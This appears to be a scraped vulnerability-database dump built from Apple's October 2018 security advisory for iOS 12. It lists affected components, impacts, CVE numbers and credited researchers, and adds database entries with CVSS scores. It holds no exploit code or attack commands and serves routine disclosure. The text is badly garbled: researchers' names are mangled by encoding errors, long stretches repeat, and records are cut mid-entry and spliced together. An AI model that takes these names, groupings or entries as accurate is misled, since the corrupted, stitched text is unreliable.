CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Symptom Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
CVE-2018-4360: William Bowling (@wcbowling)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
APFS
We would like to acknowledge Umang Raghuvanshi for their assistance.
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, Gunnar Diepenbruck,
and Zbyszek A>>A3Akiewski for their assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Quick Look
We would like to acknowledge lokihardt of Google Project Zero for
their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA//
ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf
RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP
qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL
8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX
cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk
OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7
d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd
J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ
CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy
IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv
s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4=
=dGPm
-----END PGP SIGNATURE-----
.
Installation note:
Safari 12 may be obtained from the Mac App Store
| VAR-201904-1399 | CVE-2018-4307 | iOS and Safari Logic vulnerability in |
CVSS V2: 4.3 CVSS V3: 4.3 Severity: MEDIUM |
A logic issue was addressed with improved state management. This issue affected versions prior to iOS 12, Safari 12. iOS and Safari Contains a logic vulnerability due to a flaw in state management.Information may be obtained. Apple iOS and Safari are prone to multiple security vulnerabilities.
Successfully exploiting these issues may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Apple iOS is an operating system developed for mobile devices. Safari is a web browser developed as the default browser included with MacOSX and iOS operating systems. Attackers could exploit this vulnerability with malicious websites to steal autofill data in Safari. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-8 Additional information for
APPLE-SA-2018-9-24-4 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CFNetwork
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Grand Central Dispatch
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
iBooks
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4355: evi1m0 of bilibili security team
Entry added October 30, 2018
IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
IOUserEthernet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
mDNSOffloadUserClient
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: Utku Altinkaynak
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Symptom Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
CVE-2018-4360: William Bowling (@wcbowling)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
APFS
We would like to acknowledge Umang Raghuvanshi for their assistance.
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, Gunnar Diepenbruck,
and Zbyszek A>>A3Akiewski for their assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Quick Look
We would like to acknowledge lokihardt of Google Project Zero for
their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA//
ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf
RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP
qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL
8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX
cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk
OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7
d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd
J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ
CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy
IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv
s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4=
=dGPm
-----END PGP SIGNATURE-----
.
Installation note:
Safari 12 may be obtained from the Mac App Store
| VAR-201904-1397 | CVE-2018-4305 | plural Apple Product input validation vulnerability |
CVSS V2: 3.3 CVSS V3: 6.5 Severity: MEDIUM |
An input validation issue was addressed with improved input validation. This issue affected versions prior to iOS 12, tvOS 12, watchOS 5. Apple watchOS/tvOS/iOS are prone to a remote security vulnerability.
An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. The iTunes Store is one of the digital media online store components with proprietary software as the interface. Attackers can exploit this vulnerability to forge password pop-up windows in the iTunes Store.
Alternatively, on your watch, select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-8 Additional information for
APPLE-SA-2018-9-24-4 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CFNetwork
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
